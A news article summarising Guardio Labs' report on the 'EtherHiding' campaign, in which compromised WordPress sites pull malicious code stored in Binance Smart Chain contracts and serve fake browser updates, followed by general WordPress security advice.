Guardio Labs' security researchers have shed light on a recent and concerning cybersecurity threat known as "EtherHiding" in a report released on 15 October.

EtherHiding

This technique has emerged as a sophisticated means employed by hackers to infiltrate websites powered by the WordPress platform.

Once inside, they embed malicious code designed to pilfer partial payments from blockchain contracts.

This stolen payload is subsequently deployed within Binance Smart Chain (BSC) smart contracts, effectively serving as concealed and anonymous hosting platforms for the nefarious code.

Source: Guardio Labs – the attack flow (from querying the blockchain to total site defacing and malware download)

What sets EtherHiding apart is its adaptability.

Hackers wield the ability to modify the code and alter their attack methods at will.

In a recent evolution of their tactics, they have resorted to fake browser updates as a delivery mechanism.

Unsuspecting victims are lured into updating their web browsers via counterfeit landing pages and links.

Concealed within these payloads lies JavaScript code that retrieves additional instructions from domains under the control of the attackers.

This cunning culminates in the complete defacement of websites, with counterfeit browser update notifications serving as vehicles for the distribution of malware.

The "flexibility" inherent in EtherHiding poses a significant challenge to mitigation efforts, as black hat operators can modify the attack chain with each new blockchain transaction.

Guardio Labs Security Researchers Speak Up

Nati Tal, Head of Cybersecurity at Guardio Labs, along with fellow security researcher Oleg Zaytsev, underscored the vulnerability of WordPress sites, which are frequently compromised.

They serve as a "primary gateway" for threats of this nature due to WordPress powering approximately 43% of all websites.

Both elaborated:

“WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims. While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they've quickly pivoted to take advantage of the decentralised, anonymous, and public nature of blockchain."

Once these compromised smart contracts are deployed, they operate autonomously, leaving Binance with limited recourse, relying on its developer community to identify and report malicious code within contracts as it becomes evident.

Guardio emphasised the necessity for website owners using WordPress, given its widespread usage, to be especially vigilant with their security practices.

It also pointed out that the advent of Web3 and blockchain technology introduces new avenues for unchecked malicious campaigns, calling for adaptive defense mechanisms to counter these emerging threats.

As plugins increasingly represent a substantial attack vector within the WordPress ecosystem, it is essential for users who depend on this content management system (CMS) to embrace security best practices.

This entails maintaining vigilant system hygiene by promptly applying the latest patches and updates, judiciously removing redundant administrative users, and implementing stringent password protocols.